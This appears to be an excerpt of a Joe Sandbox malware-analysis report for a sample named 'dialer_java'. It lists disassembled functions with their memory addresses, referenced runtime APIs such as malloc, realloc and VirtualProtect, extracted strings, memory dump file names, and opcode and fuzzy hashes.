Opcode ID: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
Instruction ID: 5a2a15064667de3b857896eda5324440a84f8af7a63597d9790fd6551a499801
Opcode Fuzzy Hash: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
Instruction Fuzzy Hash: 827162A6A05B4682DF388F16E54427963E1EB98FC0F149572CF8D87BA0DF2DD946C704

Function 00007FF695DD97B0 Relevance: 6.2, APIs: 4, Instructions: 163COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD97F3
realloc.MSVCRT ref: 00007FF695DD9874
realloc.MSVCRT ref: 00007FF695DD98B4
realloc.MSVCRT ref: 00007FF695DD9943

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
Instruction ID: 78a27ad214eaf65d03a52453161b101ce4d6b03e511f9274f671a399acd2b8ea
Opcode Fuzzy Hash: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
Instruction Fuzzy Hash: 715191B2A05F8582DF398F16E45426D67A1EB98F80F049272CF8D47764DF3DD85A8204

Function 00007FF695DD99D0 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD9A09
realloc.MSVCRT ref: 00007FF695DD9A8A
realloc.MSVCRT ref: 00007FF695DD9B10
realloc.MSVCRT ref: 00007FF695DD9B6B

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
Instruction ID: 7e09822fe86427bf8faed5e9615f9f500390496b44013124143ca4db0cc3e67c
Opcode Fuzzy Hash: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
Instruction Fuzzy Hash: ED517FB3A05F8982DF298F16E454269B7A1EB98FC4F048172CF9E47764DF3DD84A8204

Function 00007FF695DCE7E0 Relevance: 6.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DCE929

Part of subcall function 00007FF695DCEC60: malloc.MSVCRT ref: 00007FF695DCED36

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
Instruction ID: 1b10d1a99617772d041df1325af8ed5d201e7ec5624f086a2441eac73b3eedc9
Opcode Fuzzy Hash: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
Instruction Fuzzy Hash: F651B0B2A0AB4695EEB68B11E5402B837D4FB04F80F456671DF5C8B381DF38E96AD314

Function 00007FF695DD0720 Relevance: 6.1, APIs: 4, Instructions: 135stringCOMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD0756
malloc.MSVCRT ref: 00007FF695DD076B
malloc.MSVCRT ref: 00007FF695DD07FE
strlen.MSVCRT ref: 00007FF695DD0833

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$reallocstrlen
String ID:
API String ID: 2374275640-0
Opcode ID: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
Instruction ID: 3ef38345c55f6746fce1c1f9bac0eccf75eb3f3ac60726f7577a8d63ebe782fb
Opcode Fuzzy Hash: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
Instruction Fuzzy Hash: EB414822605B4591EB349F22F4406A837E0EB44F84F1846B1DF8D4BB91EF38D9AAC344

Function 00007FF695DE2F20 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF695DE2F8D
free.MSVCRT ref: 00007FF695DE3093
LeaveCriticalSection.KERNEL32 ref: 00007FF695DE30C7

Strings

, xrefs: 00007FF695DE2F6D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: CriticalLeaveSectionfreememset
String ID:
API String ID: 1662925646-3916222277
Opcode ID: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
Instruction ID: 3f9b52a4b842e86df0bb8b15b7492619e7f6271a13bb36a0abba0d19e3cd4d1b
Opcode Fuzzy Hash: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
Instruction Fuzzy Hash: F041C262A0964686EE359F25A44017CB791EF45BA4F40A3B1CA6F937D1DE38FD8EC304

Function 00007FF695DD8FC0 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD8FEC
realloc.MSVCRT ref: 00007FF695DD90A9
realloc.MSVCRT ref: 00007FF695DD9101
memcpy.MSVCRT ref: 00007FF695DD911B

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID:
API String ID: 1059646398-0
Opcode ID: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
Instruction ID: 3e2a2e6e2f4f97a0f12a8ec73c03432e327fbaca0ae1f9e51350d999b4da1d46
Opcode Fuzzy Hash: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
Instruction Fuzzy Hash: 0F41E5A2A05F8181EF298F25F4402B9A3A0EB58FC4F049631DB9D477A5EF2CD986C304

Function 00007FF695DDB9A0 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDB9D6
realloc.MSVCRT ref: 00007FF695DDBA9E
realloc.MSVCRT ref: 00007FF695DDBB07
memcpy.MSVCRT ref: 00007FF695DDBB23

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID:
API String ID: 1059646398-0
Opcode ID: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
Instruction ID: 9ba8526e1f1e2744f51d97ca0cd50711507ea0eb1004ce3402daac0d39c9493b
Opcode Fuzzy Hash: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
Instruction Fuzzy Hash: CA41D372A06B8182EB258B15E44476967A0EB44FC4F059272DF9D4B7A1DF3CD94AC704

Function 00007FF695DD9D00 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD9D3C
realloc.MSVCRT ref: 00007FF695DD9DC0
realloc.MSVCRT ref: 00007FF695DD9E10
realloc.MSVCRT ref: 00007FF695DD9E94

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction ID: ddf79536597cd0d4b024b32c7e76bb9160078550000d441c26f1ad1b58fb8531
Opcode Fuzzy Hash: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction Fuzzy Hash: DD516FB2A06B8682DF398F56E540269B3A1FB58FC4F048672CB8E47760DF3DE5558700

Function 00007FF695DD5B70 Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD5BAC
realloc.MSVCRT ref: 00007FF695DD5C30
realloc.MSVCRT ref: 00007FF695DD5C80
realloc.MSVCRT ref: 00007FF695DD5CDB

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
Instruction ID: 0fa6ac1049515052126dc2a07a9d278b7dc6a43a5e7919c58518aa4a7f539fed
Opcode Fuzzy Hash: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
Instruction Fuzzy Hash: EA4150B2A06B8682DF398F56F444269B3A1EB58FC4F448272CB8E477A5EF3CD5458700

Function 00007FF695DE2060 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00007FF695DE2086
fputc.MSVCRT ref: 00007FF695DE2150

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fputclocaleconv
String ID:
API String ID: 697933784-0
Opcode ID: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction ID: 96fb23adce3219f48626c53c0e42880c2d76660dcdff069e0c2026304c30fc60
Opcode Fuzzy Hash: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction Fuzzy Hash: 5E418562E05141CAF3345A66E98137EB2E1EB15F54F101375DB6E82BC1CE2CEE8A8754

Function 00007FF695DDB760 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDB7AA
realloc.MSVCRT ref: 00007FF695DDB80C
memcpy.MSVCRT ref: 00007FF695DDB826
realloc.MSVCRT ref: 00007FF695DDB85E

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
Instruction ID: 08a407b184c520e924b3548d4a53be1ae986c512cf6b92289f705f5148a060df
Opcode Fuzzy Hash: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
Instruction Fuzzy Hash: 553152B2E05F8582EE299F56F550269A3A1EB58FC4F049172CB9E47761DF3CE8458700

Function 00007FF695DDDB70 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDDC32

Strings

enum, xrefs: 00007FF695DDDBC8
struct, xrefs: 00007FF695DDDBD7
union, xrefs: 00007FF695DDDBE6

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc
String ID: enum$struct$union
API String ID: 2803490479-1076304440
Opcode ID: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
Instruction ID: e20becc215837f4552f2431d9f222a457fedd59c84141e255484fc74ee435512
Opcode Fuzzy Hash: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
Instruction Fuzzy Hash: 87310233A09A4184EB249B15E45877A22E5EB04F91F5552B6DE4E837D0DF3CE98BC304

Function 00007FF695DDE5F0 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDE65A
realloc.MSVCRT ref: 00007FF695DDE6B3
memcpy.MSVCRT ref: 00007FF695DDE6CD
realloc.MSVCRT ref: 00007FF695DDE705

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
Instruction ID: de6796b2c5420c3a6991bfb3f886990c6705afc5f03eb940a89b711d2570a6f6
Opcode Fuzzy Hash: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
Instruction Fuzzy Hash: E63182B2A05F4682EE398F56F550279B3A1EB58FC0F449572CB9E47791EF3CE8458204

Function 00007FF695DCFF19 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD003A
realloc.MSVCRT ref: 00007FF695DD00E0
malloc.MSVCRT ref: 00007FF695DD00F9
memcpy.MSVCRT ref: 00007FF695DD0114

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$memcpyrealloc
String ID:
API String ID: 2642181057-0
Opcode ID: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
Instruction ID: be474129dea0f36275183dc4df77cb6c750f701c5e8c0061b6454c21e40b5e82
Opcode Fuzzy Hash: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
Instruction Fuzzy Hash: 5431D33260AB8285DA258B21E4442E962E1FB48F94F440676CB9D8B785EF3CE949C344

Function 00007FF695DDC940 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDC9AA
realloc.MSVCRT ref: 00007FF695DDCA06
memcpy.MSVCRT ref: 00007FF695DDCA20
realloc.MSVCRT ref: 00007FF695DDCA58

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
Instruction ID: 378ed366faf6c6c77416e2e31cb9f07429ea5378a1b4b4e6684147c0bd85733b
Opcode Fuzzy Hash: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
Instruction Fuzzy Hash: 7C316DB2A05B4682EF39CF56F450279A3A1EB58FC0F049572CB9E477A5EF3CE8458204

Function 00007FF695DD7190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD7358
memcpy.MSVCRT ref: 00007FF695DD7374

Strings

%af, xrefs: 00007FF695DD730A

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memcpyrealloc
String ID: %af
API String ID: 2500458235-435209106
Opcode ID: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
Instruction ID: 43212bd782594784dccd19d9583eb1b70e04de933b88a1d5918340774b74c2bf
Opcode Fuzzy Hash: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
Instruction Fuzzy Hash: B451CD62B1C6C146D73A8734E440BAD6F61D792781F049326DFA903F95EE3DCA0A8B00

Function 00007FF695DC2410 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF695DC1247), ref: 00007FF695DC2589

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF695DC270B
Unknown pseudo relocation protocol version %d., xrefs: 00007FF695DC271B

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
Instruction ID: ab4d39cc6d98caa3459573c2218705855454628424cd406b820f50a7adc01cfb
Opcode Fuzzy Hash: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
Instruction Fuzzy Hash: 7E517A32A29546C6EF30CB25E8807B967A1EB06F54F4462B1D95D87794CF3DE88EC708

Function 00007FF695DDBED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDBF01
realloc.MSVCRT ref: 00007FF695DDBFEA

Strings

struct, xrefs: 00007FF695DDBED0

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: mallocrealloc
String ID: struct
API String ID: 948496778-3130185518
Opcode ID: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
Instruction ID: ec8c75bfbc197541be4e9f93cba7620dd202b6e62c01cdb5c434ec4eb0b3ee31
Opcode Fuzzy Hash: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
Instruction Fuzzy Hash: 9841D472A04B9581EB29CB16E4446A867B4FB58FD1F044272DF8C4B7A0DF38D996C704

